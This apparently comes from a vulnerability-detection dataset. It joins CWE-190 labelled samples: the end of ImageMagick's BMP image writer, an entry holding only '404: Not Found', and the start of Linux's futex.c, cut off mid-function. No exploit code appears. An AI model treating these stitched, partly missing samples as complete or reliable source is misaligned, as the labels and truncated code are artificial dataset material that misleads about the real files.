(void) SetImageStorageClass(image,DirectClass,exception);
else
{
bmp_info.file_size+=3*(1UL << bmp_info.bits_per_pixel);
bmp_info.offset_bits+=3*(1UL << bmp_info.bits_per_pixel);
if (type > 2)
{
bmp_info.file_size+=(1UL << bmp_info.bits_per_pixel);
bmp_info.offset_bits+=(1UL << bmp_info.bits_per_pixel);
}
}
}
if (image->storage_class == DirectClass)
{
/*
Full color BMP raster.
*/
bmp_info.number_colors=0;
bmp_info.bits_per_pixel=(unsigned short)
((type > 3) && (image->alpha_trait != UndefinedPixelTrait) ? 32 : 24);
bmp_info.compression=(unsigned int) ((type > 3) &&
(image->alpha_trait != UndefinedPixelTrait) ? BI_BITFIELDS : BI_RGB);
if ((type == 3) && (image->alpha_trait != UndefinedPixelTrait))
{
option=GetImageOption(image_info,"bmp3:alpha");
if (IsStringTrue(option))
bmp_info.bits_per_pixel=32;
}
}
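/*
  Round each scanline up to a multiple of four bytes, as the BMP format
  requires.
*/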
bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);
bmp_info.ba_offset=0;
profile=GetImageProfile(image,"icc");
have_color_info=(image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL) || (image->gamma != 0.0) ? MagickTrue :
MagickFalse;
if (type == 2)
bmp_info.size=12;
else
if ((type == 3) || ((image->alpha_trait == UndefinedPixelTrait) &&
(have_color_info == MagickFalse)))
{
type=3;
bmp_info.size=40;
}
else
{
int
extra_size;
bmp_info.size=108;
extra_size=68;
if ((image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL))
{
bmp_info.size=124;
extra_size+=16;
}
bmp_info.file_size+=extra_size;
bmp_info.offset_bits+=extra_size;
}
if ((image->columns != (signed int) image->columns) ||
(image->rows != (signed int) image->rows))
ThrowWriterException(ImageError,"WidthOrHeightExceedsLimit");
bmp_info.width=(ssize_t) image->columns;
bmp_info.height=(ssize_t) image->rows;
bmp_info.planes=1;
bmp_info.image_size=(unsigned long) (bytes_per_line*image->rows);
bmp_info.file_size+=bmp_info.image_size;
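/*
  The BMP header stores resolution in pixels per meter; 75*39 approximates
  75 DPI, and the conversions below map pixels-per-inch (x100/2.54) or
  pixels-per-centimeter (x100) resolutions to that unit.
*/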
bmp_info.x_pixels=75*39;
bmp_info.y_pixels=75*39;
switch (image->units)
{
case UndefinedResolution:
case PixelsPerInchResolution:
{
bmp_info.x_pixels=(unsigned int) (100.0*image->resolution.x/2.54);
bmp_info.y_pixels=(unsigned int) (100.0*image->resolution.y/2.54);
break;
}
case PixelsPerCentimeterResolution:
{
bmp_info.x_pixels=(unsigned int) (100.0*image->resolution.x);
bmp_info.y_pixels=(unsigned int) (100.0*image->resolution.y);
break;
}
}
bmp_info.colors_important=bmp_info.number_colors;
/*
Convert MIFF to BMP raster pixels.
*/
pixel_info=AcquireVirtualMemory((size_t) bmp_info.image_size,
sizeof(*pixels));
if (pixel_info == (MemoryInfo *) NULL)
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);
(void) ResetMagickMemory(pixels,0,(size_t) bmp_info.image_size);
switch (bmp_info.bits_per_pixel)
{
case 1:
{
size_t
bit,
byte;
/*
Convert PseudoClass image to a BMP monochrome image.
*/
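/*
  Pack eight pixels per byte, most-significant bit first, and zero-pad each
  row out to bytes_per_line.
*/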
for (y=0; y < (ssize_t) image->rows; y++)
{
ssize_t
offset;
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
bit=0;
byte=0;
for (x=0; x < (ssize_t) image->columns; x++)
{
byte<<=1;
byte|=GetPixelIndex(image,p) != 0 ? 0x01 : 0x00;
bit++;
if (bit == 8)
{
*q++=(unsigned char) byte;
bit=0;
byte=0;
}
p+=GetPixelChannels(image);
}
if (bit != 0)
{
*q++=(unsigned char) (byte << (8-bit));
x++;
}
offset=(ssize_t) (image->columns+7)/8;
for (x=offset; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 4:
{
size_t
byte,
nibble;
ssize_t
offset;
/*
Convert PseudoClass image to a BMP 4-bit (16-color) image.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
nibble=0;
byte=0;
for (x=0; x < (ssize_t) image->columns; x++)
{
byte<<=4;
byte|=((size_t) GetPixelIndex(image,p) & 0x0f);
nibble++;
if (nibble == 2)
{
*q++=(unsigned char) byte;
nibble=0;
byte=0;
}
p+=GetPixelChannels(image);
}
if (nibble != 0)
{
*q++=(unsigned char) (byte << 4);
x++;
}
offset=(ssize_t) (image->columns+1)/2;
for (x=offset; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 8:
{
/*
Convert PseudoClass packet to BMP pixel.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=(unsigned char) GetPixelIndex(image,p);
p+=GetPixelChannels(image);
}
for ( ; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 24:
{
/*
Convert DirectClass packet to BMP BGR888.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=ScaleQuantumToChar(GetPixelBlue(image,p));
*q++=ScaleQuantumToChar(GetPixelGreen(image,p));
*q++=ScaleQuantumToChar(GetPixelRed(image,p));
p+=GetPixelChannels(image);
}
for (x=3L*(ssize_t) image->columns; x < (ssize_t) bytes_per_line; x++)
*q++=0x00;
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
case 32:
{
/*
Convert DirectClass packet to ARGB8888 pixel.
*/
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetVirtualPixels(image,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
q=pixels+(image->rows-y-1)*bytes_per_line;
for (x=0; x < (ssize_t) image->columns; x++)
{
*q++=ScaleQuantumToChar(GetPixelBlue(image,p));
*q++=ScaleQuantumToChar(GetPixelGreen(image,p));
*q++=ScaleQuantumToChar(GetPixelRed(image,p));
*q++=ScaleQuantumToChar(GetPixelAlpha(image,p));
p+=GetPixelChannels(image);
}
if (image->previous == (Image *) NULL)
{
status=SetImageProgress(image,SaveImageTag,(MagickOffsetType) y,
image->rows);
if (status == MagickFalse)
break;
}
}
break;
}
}
if ((type > 2) && (bmp_info.bits_per_pixel == 8))
if (image_info->compression != NoCompression)
{
MemoryInfo
*rle_info;
/*
Convert run-length encoded raster pixels.
*/
rle_info=AcquireVirtualMemory((size_t) (2*(bytes_per_line+2)+2),
(image->rows+2)*sizeof(*pixels));
if (rle_info == (MemoryInfo *) NULL)
{
pixel_info=RelinquishVirtualMemory(pixel_info);
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
}
bmp_data=(unsigned char *) GetVirtualMemoryBlob(rle_info);
bmp_info.file_size-=bmp_info.image_size;
bmp_info.image_size=(unsigned int) EncodeImage(image,bytes_per_line,
pixels,bmp_data);
bmp_info.file_size+=bmp_info.image_size;
pixel_info=RelinquishVirtualMemory(pixel_info);
pixel_info=rle_info;
pixels=bmp_data;
bmp_info.compression=BI_RLE8;
}
/*
Write BMP for Windows, all versions, 14-byte header.
*/
if (image->debug != MagickFalse)
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Writing BMP version %.20g datastream",(double) type);
if (image->storage_class == DirectClass)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Storage class=DirectClass");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Storage class=PseudoClass");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Image depth=%.20g",(double) image->depth);
if (image->alpha_trait != UndefinedPixelTrait)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Matte=True");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Matte=MagickFalse");
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" BMP bits_per_pixel=%.20g",(double) bmp_info.bits_per_pixel);
switch ((int) bmp_info.compression)
{
case BI_RGB:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_RGB");
break;
}
case BI_RLE8:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_RLE8");
break;
}
case BI_BITFIELDS:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_BITFIELDS");
break;
}
default:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=UNKNOWN (%lu)",bmp_info.compression);
break;
}
}
if (bmp_info.number_colors == 0)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number_colors=unspecified");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number_colors=%lu",bmp_info.number_colors);
}
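/*
  14-byte BITMAPFILEHEADER: the "BM" signature (2 bytes), the total file
  size (4 bytes), a reserved field written here as ba_offset (4 bytes,
  always 0), and the offset to the pixel data (4 bytes).
*/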
(void) WriteBlob(image,2,(unsigned char *) "BM");
(void) WriteBlobLSBLong(image,bmp_info.file_size);
(void) WriteBlobLSBLong(image,bmp_info.ba_offset); /* always 0 */
(void) WriteBlobLSBLong(image,bmp_info.offset_bits);
if (type == 2)
{
/*
Write 12-byte version 2 bitmap header.
*/
(void) WriteBlobLSBLong(image,bmp_info.size);
(void) WriteBlobLSBSignedShort(image,(signed short) bmp_info.width);
(void) WriteBlobLSBSignedShort(image,(signed short) bmp_info.height);
(void) WriteBlobLSBShort(image,bmp_info.planes);
(void) WriteBlobLSBShort(image,bmp_info.bits_per_pixel);
}
else
{
/*
Write 40-byte version 3+ bitmap header.
*/
(void) WriteBlobLSBLong(image,bmp_info.size);
(void) WriteBlobLSBSignedLong(image,(signed int) bmp_info.width);
(void) WriteBlobLSBSignedLong(image,(signed int) bmp_info.height);
(void) WriteBlobLSBShort(image,bmp_info.planes);
(void) WriteBlobLSBShort(image,bmp_info.bits_per_pixel);
(void) WriteBlobLSBLong(image,bmp_info.compression);
(void) WriteBlobLSBLong(image,bmp_info.image_size);
(void) WriteBlobLSBLong(image,bmp_info.x_pixels);
(void) WriteBlobLSBLong(image,bmp_info.y_pixels);
(void) WriteBlobLSBLong(image,bmp_info.number_colors);
(void) WriteBlobLSBLong(image,bmp_info.colors_important);
}
if ((type > 3) && ((image->alpha_trait != UndefinedPixelTrait) ||
(have_color_info != MagickFalse)))
{
/*
Write the rest of the 108-byte BMP Version 4 header.
*/
(void) WriteBlobLSBLong(image,0x00ff0000U); /* Red mask */
(void) WriteBlobLSBLong(image,0x0000ff00U); /* Green mask */
(void) WriteBlobLSBLong(image,0x000000ffU); /* Blue mask */
(void) WriteBlobLSBLong(image,0xff000000U); /* Alpha mask */
(void) WriteBlobLSBLong(image,0x73524742U); /* sRGB */
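/*
  Chromaticity endpoints are CIEXYZTRIPLE values in 2.30 fixed point
  (scaled by 0x40000000); the gamma values below use 16.16 fixed point.
*/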
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.red_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.red_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.red_primary.x+
image->chromaticity.red_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.green_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.green_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.green_primary.x+
image->chromaticity.green_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.blue_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.blue_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.blue_primary.x+
image->chromaticity.blue_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.x*0x10000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.y*0x10000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.z*0x10000));
if ((image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL))
{
ssize_t
intent;
switch ((int) image->rendering_intent)
{
case SaturationIntent:
{
intent=LCS_GM_BUSINESS;
break;
}
case RelativeIntent:
{
intent=LCS_GM_GRAPHICS;
break;
}
case PerceptualIntent:
{
intent=LCS_GM_IMAGES;
break;
}
case AbsoluteIntent:
{
intent=LCS_GM_ABS_COLORIMETRIC;
break;
}
default:
{
intent=0;
break;
}
}
(void) WriteBlobLSBLong(image,(unsigned int) intent);
(void) WriteBlobLSBLong(image,0x00); /* dummy profile data */
(void) WriteBlobLSBLong(image,0x00); /* dummy profile length */
(void) WriteBlobLSBLong(image,0x00); /* reserved */
}
}
if (image->storage_class == PseudoClass)
{
unsigned char
*bmp_colormap;
/*
Dump colormap to file.
*/
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Colormap: %.20g entries",(double) image->colors);
bmp_colormap=(unsigned char *) AcquireQuantumMemory((size_t) (1UL <<
bmp_info.bits_per_pixel),4*sizeof(*bmp_colormap));
if (bmp_colormap == (unsigned char *) NULL)
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
q=bmp_colormap;
for (i=0; i < (ssize_t) MagickMin((ssize_t) image->colors,(ssize_t) bmp_info.number_colors); i++)
{
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].blue));
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].green));
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].red));
if (type > 2)
*q++=(unsigned char) 0x0;
}
for ( ; i < (ssize_t) (1UL << bmp_info.bits_per_pixel); i++)
{
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
if (type > 2)
*q++=(unsigned char) 0x00;
}
if (type <= 2)
(void) WriteBlob(image,(size_t) (3*(1L << bmp_info.bits_per_pixel)),
bmp_colormap);
else
(void) WriteBlob(image,(size_t) (4*(1L << bmp_info.bits_per_pixel)),
bmp_colormap);
bmp_colormap=(unsigned char *) RelinquishMagickMemory(bmp_colormap);
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Pixels: %lu bytes",bmp_info.image_size);
(void) WriteBlob(image,(size_t) bmp_info.image_size,pixels);
pixel_info=RelinquishVirtualMemory(pixel_info);
if (GetNextImageInList(image) == (Image *) NULL)
break;
image=SyncNextImageInList(image);
status=SetImageProgress(image,SaveImagesTag,scene++,
GetImageListLength(image));
if (status == MagickFalse)
break;
} while (image_info->adjoin != MagickFalse);
(void) CloseBlob(image);
return(MagickTrue);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5223_1 |
crossvul-cpp_data_bad_4015_2 | 404: Not Found | ./CrossVul/dataset_final_sorted/CWE-190/c/bad_4015_2 |
crossvul-cpp_data_good_620_0 | /*
* Fast Userspace Mutexes (which I call "Futexes!").
* (C) Rusty Russell, IBM 2002
*
* Generalized futexes, futex requeueing, misc fixes by Ingo Molnar
* (C) Copyright 2003 Red Hat Inc, All Rights Reserved
*
* Removed page pinning, fix privately mapped COW pages and other cleanups
* (C) Copyright 2003, 2004 Jamie Lokier
*
* Robust futex support started by Ingo Molnar
* (C) Copyright 2006 Red Hat Inc, All Rights Reserved
* Thanks to Thomas Gleixner for suggestions, analysis and fixes.
*
* PI-futex support started by Ingo Molnar and Thomas Gleixner
* Copyright (C) 2006 Red Hat, Inc., Ingo Molnar <mingo@redhat.com>
* Copyright (C) 2006 Timesys Corp., Thomas Gleixner <tglx@timesys.com>
*
* PRIVATE futexes by Eric Dumazet
* Copyright (C) 2007 Eric Dumazet <dada1@cosmosbay.com>
*
* Requeue-PI support by Darren Hart <dvhltc@us.ibm.com>
* Copyright (C) IBM Corporation, 2009
* Thanks to Thomas Gleixner for conceptual design and careful reviews.
*
* Thanks to Ben LaHaise for yelling "hashed waitqueues" loudly
* enough at me, Linus for the original (flawed) idea, Matthew
* Kirkwood for proof-of-concept implementation.
*
* "The futexes are also cursed."
* "But they come in a choice of three flavours!"
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <linux/slab.h>
#include <linux/poll.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/jhash.h>
#include <linux/init.h>
#include <linux/futex.h>
#include <linux/mount.h>
#include <linux/pagemap.h>
#include <linux/syscalls.h>
#include <linux/signal.h>
#include <linux/export.h>
#include <linux/magic.h>
#include <linux/pid.h>
#include <linux/nsproxy.h>
#include <linux/ptrace.h>
#include <linux/sched/rt.h>
#include <linux/sched/wake_q.h>
#include <linux/sched/mm.h>
#include <linux/hugetlb.h>
#include <linux/freezer.h>
#include <linux/bootmem.h>
#include <linux/fault-inject.h>
#include <asm/futex.h>
#include "locking/rtmutex_common.h"
/*
* READ this before attempting to hack on futexes!
*
* Basic futex operation and ordering guarantees
* =============================================
*
* The waiter reads the futex value in user space and calls
* futex_wait(). This function computes the hash bucket and acquires
* the hash bucket lock. After that it reads the futex user space value
* again and verifies that the data has not changed. If it has not changed
* it enqueues itself into the hash bucket, releases the hash bucket lock
* and schedules.
*
* The waker side modifies the user space value of the futex and calls
* futex_wake(). This function computes the hash bucket and acquires the
* hash bucket lock. Then it looks for waiters on that futex in the hash
* bucket and wakes them.
*
* In futex wake up scenarios where no tasks are blocked on a futex, taking
* the hb spinlock can be avoided and simply return. In order for this
* optimization to work, ordering guarantees must exist so that the waiter
* being added to the list is acknowledged when the list is concurrently being
* checked by the waker, avoiding scenarios like the following:
*
* CPU 0 CPU 1
* val = *futex;
* sys_futex(WAIT, futex, val);
* futex_wait(futex, val);
* uval = *futex;
* *futex = newval;
* sys_futex(WAKE, futex);
* futex_wake(futex);
* if (queue_empty())
* return;
* if (uval == val)
* lock(hash_bucket(futex));
* queue();
* unlock(hash_bucket(futex));
* schedule();
*
* This would cause the waiter on CPU 0 to wait forever because it
* missed the transition of the user space value from val to newval
* and the waker did not find the waiter in the hash bucket queue.
*
* The correct serialization ensures that a waiter either observes
* the changed user space value before blocking or is woken by a
* concurrent waker:
*
* CPU 0 CPU 1
* val = *futex;
* sys_futex(WAIT, futex, val);
* futex_wait(futex, val);
*
* waiters++; (a)
* smp_mb(); (A) <-- paired with -.
* |
* lock(hash_bucket(futex)); |
* |
* uval = *futex; |
* | *futex = newval;
* | sys_futex(WAKE, futex);
* | futex_wake(futex);
* |
* `--------> smp_mb(); (B)
* if (uval == val)
* queue();
* unlock(hash_bucket(futex));
* schedule(); if (waiters)
* lock(hash_bucket(futex));
* else wake_waiters(futex);
* waiters--; (b) unlock(hash_bucket(futex));
*
* Where (A) orders the waiters increment and the futex value read through
* atomic operations (see hb_waiters_inc) and where (B) orders the write
* to futex and the waiters read -- this is done by the barriers for both
* shared and private futexes in get_futex_key_refs().
*
* This yields the following case (where X:=waiters, Y:=futex):
*
* X = Y = 0
*
* w[X]=1 w[Y]=1
* MB MB
* r[Y]=y r[X]=x
*
* Which guarantees that x==0 && y==0 is impossible; which translates back into
* the guarantee that we cannot both miss the futex variable change and the
* enqueue.
*
* Note that a new waiter is accounted for in (a) even when it is possible that
 * the wait call can return an error, in which case we backtrack from it in (b).
* Refer to the comment in queue_lock().
*
* Similarly, in order to account for waiters being requeued on another
* address we always increment the waiters for the destination bucket before
* acquiring the lock. It then decrements them again after releasing it -
* the code that actually moves the futex(es) between hash buckets (requeue_futex)
* will do the additional required waiter count housekeeping. This is done for
* double_lock_hb() and double_unlock_hb(), respectively.
*/
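/*
 * Illustrative user-space sketch (editorial addition, not part of this file):
 * the waiter/waker protocol described above, driven through the raw futex(2)
 * syscall.  The helper and variable names are hypothetical.
 */
#if 0
#include <linux/futex.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <stdatomic.h>

static _Atomic unsigned int futex_word;

static long raw_futex(unsigned int *uaddr, int op, unsigned int val)
{
	/* futex(2): the remaining arguments (timeout, uaddr2, val3) are unused here. */
	return syscall(SYS_futex, uaddr, op, val, NULL, NULL, 0);
}

static void wait_on_word(unsigned int expected)
{
	/* CPU 0 above: block only while the futex word still holds 'expected'. */
	raw_futex((unsigned int *)&futex_word, FUTEX_WAIT_PRIVATE, expected);
}

static void wake_one(unsigned int newval)
{
	/* CPU 1 above: publish the new value, then wake a single waiter. */
	atomic_store(&futex_word, newval);
	raw_futex((unsigned int *)&futex_word, FUTEX_WAKE_PRIVATE, 1);
}
#endif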
#ifndef CONFIG_HAVE_FUTEX_CMPXCHG
int __read_mostly futex_cmpxchg_enabled;
#endif
/*
* Futex flags used to encode options to functions and preserve them across
* restarts.
*/
#ifdef CONFIG_MMU
# define FLAGS_SHARED 0x01
#else
/*
* NOMMU does not have per process address space. Let the compiler optimize
* code away.
*/
# define FLAGS_SHARED 0x00
#endif
#define FLAGS_CLOCKRT 0x02
#define FLAGS_HAS_TIMEOUT 0x04
/*
* Priority Inheritance state:
*/
struct futex_pi_state {
/*
* list of 'owned' pi_state instances - these have to be
* cleaned up in do_exit() if the task exits prematurely:
*/
struct list_head list;
/*
* The PI object:
*/
struct rt_mutex pi_mutex;
struct task_struct *owner;
atomic_t refcount;
union futex_key key;
} __randomize_layout;
/**
* struct futex_q - The hashed futex queue entry, one per waiting task
* @list: priority-sorted list of tasks waiting on this futex
* @task: the task waiting on the futex
* @lock_ptr: the hash bucket lock
* @key: the key the futex is hashed on
* @pi_state: optional priority inheritance state
* @rt_waiter: rt_waiter storage for use with requeue_pi
* @requeue_pi_key: the requeue_pi target futex key
* @bitset: bitset for the optional bitmasked wakeup
*
* We use this hashed waitqueue, instead of a normal wait_queue_entry_t, so
* we can wake only the relevant ones (hashed queues may be shared).
*
* A futex_q has a woken state, just like tasks have TASK_RUNNING.
* It is considered woken when plist_node_empty(&q->list) || q->lock_ptr == 0.
* The order of wakeup is always to make the first condition true, then
* the second.
*
* PI futexes are typically woken before they are removed from the hash list via
* the rt_mutex code. See unqueue_me_pi().
*/
struct futex_q {
struct plist_node list;
struct task_struct *task;
spinlock_t *lock_ptr;
union futex_key key;
struct futex_pi_state *pi_state;
struct rt_mutex_waiter *rt_waiter;
union futex_key *requeue_pi_key;
u32 bitset;
} __randomize_layout;
static const struct futex_q futex_q_init = {
/* list gets initialized in queue_me()*/
.key = FUTEX_KEY_INIT,
.bitset = FUTEX_BITSET_MATCH_ANY
};
/*
* Hash buckets are shared by all the futex_keys that hash to the same
* location. Each key may have multiple futex_q structures, one for each task
* waiting on a futex.
*/
struct futex_hash_bucket {
atomic_t waiters;
spinlock_t lock;
struct plist_head chain;
} ____cacheline_aligned_in_smp;
/*
* The base of the bucket array and its size are always used together
* (after initialization only in hash_futex()), so ensure that they
* reside in the same cacheline.
*/
static struct {
struct futex_hash_bucket *queues;
unsigned long hashsize;
} __futex_data __read_mostly __aligned(2*sizeof(long));
#define futex_queues (__futex_data.queues)
#define futex_hashsize (__futex_data.hashsize)
/*
* Fault injections for futexes.
*/
#ifdef CONFIG_FAIL_FUTEX
static struct {
struct fault_attr attr;
bool ignore_private;
} fail_futex = {
.attr = FAULT_ATTR_INITIALIZER,
.ignore_private = false,
};
static int __init setup_fail_futex(char *str)
{
return setup_fault_attr(&fail_futex.attr, str);
}
__setup("fail_futex=", setup_fail_futex);
static bool should_fail_futex(bool fshared)
{
if (fail_futex.ignore_private && !fshared)
return false;
return should_fail(&fail_futex.attr, 1);
}
#ifdef CONFIG_FAULT_INJECTION_DEBUG_FS
static int __init fail_futex_debugfs(void)
{
umode_t mode = S_IFREG | S_IRUSR | S_IWUSR;
struct dentry *dir;
dir = fault_create_debugfs_attr("fail_futex", NULL,
&fail_futex.attr);
if (IS_ERR(dir))
return PTR_ERR(dir);
if (!debugfs_create_bool("ignore-private", mode, dir,
&fail_futex.ignore_private)) {
debugfs_remove_recursive(dir);
return -ENOMEM;
}
return 0;
}
late_initcall(fail_futex_debugfs);
#endif /* CONFIG_FAULT_INJECTION_DEBUG_FS */
#else
static inline bool should_fail_futex(bool fshared)
{
return false;
}
#endif /* CONFIG_FAIL_FUTEX */
static inline void futex_get_mm(union futex_key *key)
{
mmgrab(key->private.mm);
/*
* Ensure futex_get_mm() implies a full barrier such that
* get_futex_key() implies a full barrier. This is relied upon
* as smp_mb(); (B), see the ordering comment above.
*/
smp_mb__after_atomic();
}
/*
* Reflects a new waiter being added to the waitqueue.
*/
static inline void hb_waiters_inc(struct futex_hash_bucket *hb)
{
#ifdef CONFIG_SMP
atomic_inc(&hb->waiters);
/*
* Full barrier (A), see the ordering comment above.
*/
smp_mb__after_atomic();
#endif
}
/*
* Reflects a waiter being removed from the waitqueue by wakeup
* paths.
*/
static inline void hb_waiters_dec(struct futex_hash_bucket *hb)
{
#ifdef CONFIG_SMP
atomic_dec(&hb->waiters);
#endif
}
static inline int hb_waiters_pending(struct futex_hash_bucket *hb)
{
#ifdef CONFIG_SMP
return atomic_read(&hb->waiters);
#else
return 1;
#endif
}
/**
* hash_futex - Return the hash bucket in the global hash
* @key: Pointer to the futex key for which the hash is calculated
*
* We hash on the keys returned from get_futex_key (see below) and return the
* corresponding hash bucket in the global hash.
*/
static struct futex_hash_bucket *hash_futex(union futex_key *key)
{
u32 hash = jhash2((u32*)&key->both.word,
(sizeof(key->both.word)+sizeof(key->both.ptr))/4,
key->both.offset);
return &futex_queues[hash & (futex_hashsize - 1)];
}
/**
* match_futex - Check whether two futex keys are equal
* @key1: Pointer to key1
* @key2: Pointer to key2
*
* Return 1 if two futex_keys are equal, 0 otherwise.
*/
static inline int match_futex(union futex_key *key1, union futex_key *key2)
{
return (key1 && key2
&& key1->both.word == key2->both.word
&& key1->both.ptr == key2->both.ptr
&& key1->both.offset == key2->both.offset);
}
/*
* Take a reference to the resource addressed by a key.
* Can be called while holding spinlocks.
*
*/
static void get_futex_key_refs(union futex_key *key)
{
if (!key->both.ptr)
return;
/*
* On MMU less systems futexes are always "private" as there is no per
* process address space. We need the smp wmb nevertheless - yes,
* arch/blackfin has MMU less SMP ...
*/
if (!IS_ENABLED(CONFIG_MMU)) {
smp_mb(); /* explicit smp_mb(); (B) */
return;
}
switch (key->both.offset & (FUT_OFF_INODE|FUT_OFF_MMSHARED)) {
case FUT_OFF_INODE:
ihold(key->shared.inode); /* implies smp_mb(); (B) */
break;
case FUT_OFF_MMSHARED:
futex_get_mm(key); /* implies smp_mb(); (B) */
break;
default:
/*
 * Private futexes do not hold a reference on an inode or
 * mm, therefore the only purpose of calling get_futex_key_refs
 * is the barrier we need for the lockless waiter check.
*/
smp_mb(); /* explicit smp_mb(); (B) */
}
}
/*
* Drop a reference to the resource addressed by a key.
* The hash bucket spinlock must not be held. This is
* a no-op for private futexes, see comment in the get
* counterpart.
*/
static void drop_futex_key_refs(union futex_key *key)
{
if (!key->both.ptr) {
/* If we're here then we tried to put a key we failed to get */
WARN_ON_ONCE(1);
return;
}
if (!IS_ENABLED(CONFIG_MMU))
return;
switch (key->both.offset & (FUT_OFF_INODE|FUT_OFF_MMSHARED)) {
case FUT_OFF_INODE:
iput(key->shared.inode);
break;
case FUT_OFF_MMSHARED:
mmdrop(key->private.mm);
break;
}
}
/**
* get_futex_key() - Get parameters which are the keys for a futex
* @uaddr: virtual address of the futex
* @fshared: 0 for a PROCESS_PRIVATE futex, 1 for PROCESS_SHARED
* @key: address where result is stored.
* @rw: mapping needs to be read/write (values: VERIFY_READ,
* VERIFY_WRITE)
*
* Return: a negative error code or 0
*
* The key words are stored in @key on success.
*
* For shared mappings, it's (page->index, file_inode(vma->vm_file),
* offset_within_page). For private mappings, it's (uaddr, current->mm).
* We can usually work out the index without swapping in the page.
*
* lock_page() might sleep, the caller should not hold a spinlock.
*/
static int
get_futex_key(u32 __user *uaddr, int fshared, union futex_key *key, int rw)
{
unsigned long address = (unsigned long)uaddr;
struct mm_struct *mm = current->mm;
struct page *page, *tail;
struct address_space *mapping;
int err, ro = 0;
/*
* The futex address must be "naturally" aligned.
*/
key->both.offset = address % PAGE_SIZE;
if (unlikely((address % sizeof(u32)) != 0))
return -EINVAL;
address -= key->both.offset;
